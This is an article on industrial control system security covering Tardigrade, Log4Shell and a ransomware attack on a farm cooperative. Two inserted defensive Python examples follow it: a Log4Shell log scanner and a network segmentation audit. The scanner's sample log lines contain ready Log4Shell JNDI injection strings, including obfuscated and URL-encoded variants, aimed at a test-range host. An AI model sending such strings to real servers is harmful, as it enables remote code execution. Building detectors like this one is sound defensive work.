Adapting industrial control system (ICS) security to the new normal

Although the number of high-profile attacks in the second half of 2021 declined slightly from the first half, their impact did not. With cyber-physical assets more connected than ever, security measures for critical industrial, healthcare and enterprise ICS devices have moved to the front seat. A recent report found that 34% of vulnerabilities disclosed in the second half of 2021 affected cyber-physical systems in the internet of things (IoT), information technology (IT) and internet of medical things (IoMT) verticals, which shows that these measures must cover the entire extended internet of things (XIoT), not only operational technology (OT).

Tardigrade malware

Spreading through several biomanufacturing facilities, the Tardigrade malware was responsible for at least two attacks on the healthcare sector, in April and October, that allowed bad actors to obtain sensitive company information and deploy further malware.

Tardigrade is polymorphic: it changes its properties according to the environment it lands in, which makes it hard to predict and protect against. BioBright researchers compared it to Smoke Loader and, more specifically, described it as having trojan functionality: once installed on a victim network it searches for stored passwords, deploys a keylogger, begins exfiltrating data and establishes a backdoor that leaves the attackers free to choose their next move.

In response to the known attacks, healthcare companies that could be at risk were warned to scan their biomanufacturing networks for any signs of compromise. In its advisory, the Bioeconomy Information Sharing and Analysis Center (BIO-ISAC), the nonprofit that first published the Tardigrade research, recommended treating networks as if they were already compromised or soon would be, and reviewing and adjusting cybersecurity measures accordingly.

Log4j

Another major vulnerability of the second half of 2021, Log4Shell (CVE-2021-44228) was a zero-day first disclosed publicly in December that affects Log4j, the widely used Java-based logging library. It can be exploited by remote, unauthenticated users, and a list published by CISA named more than 100 affected vendors, of which more than 20 are ICS vendors.

Because Log4j is widely used in OT environments as well, those environments were just as exploitable, and the fact that exploitation works remotely made attacks easy to mount. Following the disclosure, Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly noted that the flaw presented an urgent challenge to network defenders given its broad use. End users depend on their vendors, so the vendor community was asked to immediately identify, mitigate and patch the wide array of products that embed this library, and to tell customers which products contained the vulnerability so that software updates could be prioritized.
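Because Log4Shell is triggered by a lookup string that merely has to be logged, the first thing a defender can do while waiting for vendor patches is to look for exploitation attempts in whatever request logs the affected products already write. The following is an added example, not code from the article or from Claroty: a small Python scanner that URL-decodes each line, folds the common lookup obfuscations (`${lower:j}`, `${upper:J}`, `${::-j}`, `${env:X:-j}`) back into plain text, and then flags any resulting `${jndi:<scheme>:...}` lookup. The access-log lines are constructed for the example; the hostnames and addresses in them are not real.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with its scheme (ldap, ldaps, rmi, dns, ...), matched after de-obfuscation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)

# Constructed Apache-style access-log lines (addresses from RFC 5737 test ranges).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:04:12:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:04:13:11 +0000] "GET / HTTP/1.1" 200 118 "-" '
    '"${jndi:ldap://198.51.100.9:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:04:13:12 +0000] "GET / HTTP/1.1" 200 118 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.9:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:04:13:14 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3A'
    'rmi%3A%2F%2F198.51.100.9%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.5 - - [10/Dec/2021:04:14:00 +0000] "GET /status HTTP/1.1" 200 40 "-" '
    '"${env:HOSTNAME}-monitor"',
]


def _resolve(match):
    """Reduce one innermost lookup the way Log4j's interpolator would, or leave it alone."""
    body = match.group(1)
    key = body.lower()
    if key.startswith("lower:"):
        return body[6:].lower()
    if key.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        # ${name:-default}: an empty or unresolvable name falls back to the default text.
        return body.split(":-", 1)[1]
    # Other lookups, including ${jndi:...} itself, are kept for the detector to see.
    return match.group(0)


def decode_lookups(text, max_passes=20):
    """URL-decode, then repeatedly fold innermost lookups until nothing changes."""
    prev = None
    cur = unquote(text)
    passes = 0
    while cur != prev and passes < max_passes:
        prev, cur = cur, _INNER.sub(_resolve, cur)
        passes += 1
    return cur


def detect_jndi(text):
    """Return the JNDI scheme (e.g. 'ldap') if the line carries a lookup, else None."""
    m = _JNDI.search(decode_lookups(text))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line_number, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = detect_jndi(line)
        if scheme:
            hits.append((n, scheme))
    return hits


if __name__ == "__main__":
    for n, scheme in scan(SAMPLE_ACCESS_LOG):
        print(f"line {n}: JNDI lookup via {scheme}")
```

The last sample line shows why the detector keys on `jndi:` after de-obfuscation rather than on `${` alone: a benign `${env:...}` lookup in a user agent is noise, not an attack, while the nested and percent-encoded variants on lines 3 and 4 are the same payload as line 2 once folded. The folding rules cover the obfuscations seen most often in the wild; they are not a complete model of Log4j's interpolator.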

New Cooperative ransomware attack 

Food and beverage manufacturers are a uniquely vulnerable industry and have drawn growing attention because of the damage a disruption of their production could cause. As with the JBS Foods attack earlier in 2021, NEW Cooperative, an Iowa-based farmer cooperative that forms part of the state's agricultural supply chain, suffered a ransomware attack in September, carried out by the BlackMatter group.

Like JBS Foods, NEW Cooperative quickly and proactively took its systems offline to contain the attack and limit damage. With 40% of grain production running on its software and the feed schedules of 11 million animals depending on it, a prolonged outage would quickly have hurt the food supply chain.

Recommendations for ICS security

Studying these three major incidents from the last six months of 2021, security professionals can draw several measures that better protect the XIoT going forward. ICS security measures include network segmentation, phishing and spam protection, and protection of remote-access connections.

This year made clear that network segmentation is key to protecting remotely accessible, internet-connected industrial devices. To defend against these kinds of attacks, network administrators should ensure that their networks are virtually segmented and set up so that they can still be managed and controlled remotely.

In addition, phishing attempts have increased with remote work. They can be countered by, among other measures, not clicking links from unknown senders, not sharing passwords and enforcing multifactor authentication.

Remote-access connections must also be protected, as they are a critically important part of OT and industrial environments in the new normal. Security professionals in these industries should verify that VPN vulnerabilities are patched, monitor all remote connections, and enforce the permissions and administrative controls that govern user access.
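Segmentation and remote-access control come down to the same question: is each observed connection one the zone model permits? The following is an added example, not code from the article or from Claroty, that turns the two recommendations above (segmented zones, monitored and restricted remote sessions) into a check that can be run over exported flow records. The zones, addresses, jump host, user allowlist and the flow-record format are all assumptions constructed for the example; a real deployment would load them from the firewall and VPN concentrator configuration.

```python
import ipaddress
import re

# Hypothetical zone map: enterprise IT, the VPN client pool, a DMZ holding the jump host,
# the control network (HMIs, engineering workstations) and the field network (PLCs, RTUs).
ZONES = {
    "enterprise": ipaddress.ip_network("10.10.0.0/16"),
    "remote":     ipaddress.ip_network("10.200.0.0/24"),
    "dmz":        ipaddress.ip_network("172.16.10.0/24"),
    "control":    ipaddress.ip_network("192.168.50.0/24"),
    "field":      ipaddress.ip_network("192.168.60.0/24"),
}
JUMP_HOST = ipaddress.ip_address("172.16.10.5")

# Permitted (source zone, destination zone) pairs and destination ports; anything else is denied.
POLICY = {
    ("enterprise", "dmz"): {443},
    ("remote", "dmz"):     {22, 3389},      # VPN users land on the DMZ only
    ("dmz", "control"):    {22, 3389},      # the jump host reaches engineering stations
    ("control", "field"):  {502, 44818},    # Modbus/TCP and EtherNet/IP to the PLCs
}
REMOTE_USERS = {"eng-alice", "eng-bob"}     # accounts approved for remote OT access

# Constructed flow records in a simple key=value export format (assumed, not a vendor format).
SAMPLE_FLOWS = [
    "2021-12-15T02:14:07Z src=10.10.5.23 dst=172.16.10.5 dport=443 proto=tcp",
    "2021-12-15T02:14:09Z src=10.10.5.23 dst=192.168.60.12 dport=502 proto=tcp",
    "2021-12-15T02:15:00Z src=10.200.0.17 dst=172.16.10.5 dport=3389 proto=tcp user=eng-alice",
    "2021-12-15T02:15:31Z src=10.200.0.31 dst=192.168.50.10 dport=3389 proto=tcp user=vendor-temp",
    "2021-12-15T02:16:02Z src=172.16.10.5 dst=192.168.50.10 dport=22 proto=tcp user=eng-alice",
    "2021-12-15T02:16:40Z src=192.168.50.10 dst=192.168.60.12 dport=502 proto=tcp",
    "2021-12-15T02:17:05Z src=192.168.50.10 dst=192.168.60.12 dport=23 proto=tcp",
]

_FLOW = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)"
    r"\s+proto=(?P<proto>\w+)(?:\s+user=(?P<user>\S+))?\s*$"
)


def zone_of(ip):
    """Name of the zone containing ip, or None if the address is unmapped."""
    for name, net in ZONES.items():
        if ip in net:
            return name
    return None


def parse_flow(line):
    m = _FLOW.match(line)
    if not m:
        raise ValueError(f"unparseable flow record: {line!r}")
    flow = m.groupdict()
    flow["src"] = ipaddress.ip_address(flow["src"])
    flow["dst"] = ipaddress.ip_address(flow["dst"])
    flow["dport"] = int(flow["dport"])
    return flow


def check_flow(flow):
    """Return the list of policy violations for one flow; an empty list means it is permitted."""
    reasons = []
    sz, dz = zone_of(flow["src"]), zone_of(flow["dst"])
    if sz is None or dz is None:
        reasons.append(f"unmapped address {flow['src'] if sz is None else flow['dst']}")
        return reasons
    if sz != dz:                                   # intra-zone traffic is not the concern here
        allowed = POLICY.get((sz, dz))
        if allowed is None:
            reasons.append(f"{sz}->{dz} is not a permitted zone pair")
        elif flow["dport"] not in allowed:
            reasons.append(f"{sz}->{dz} port {flow['dport']} not permitted")
    if sz == "remote":                             # extra rules for VPN-originated sessions
        if flow["dst"] != JUMP_HOST:
            reasons.append("remote session must terminate on the jump host")
        if flow.get("user") not in REMOTE_USERS:
            reasons.append(f"remote user {flow.get('user')!r} is not on the allowlist")
    return reasons


def audit(lines):
    """Return (line_number, reasons) for every flow record that violates the policy."""
    findings = []
    for n, line in enumerate(lines, 1):
        reasons = check_flow(parse_flow(line))
        if reasons:
            findings.append((n, reasons))
    return findings


if __name__ == "__main__":
    for n, reasons in audit(SAMPLE_FLOWS):
        print(f"flow {n}: " + "; ".join(reasons))
```

Run over the sample, the audit flags the enterprise workstation speaking Modbus straight to a PLC (a segmentation bypass), the unapproved VPN account reaching an engineering station directly instead of through the jump host (three separate violations on one flow), and telnet from the control network to a PLC (an unexpected port on an otherwise permitted path). The approved engineer's path, VPN to jump host to engineering station to PLC, passes cleanly, which is the point of the model: least privilege is expressed once as zone pairs and ports and then checked mechanically rather than by eye.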

Chen Fradkin is a data scientist at Claroty.
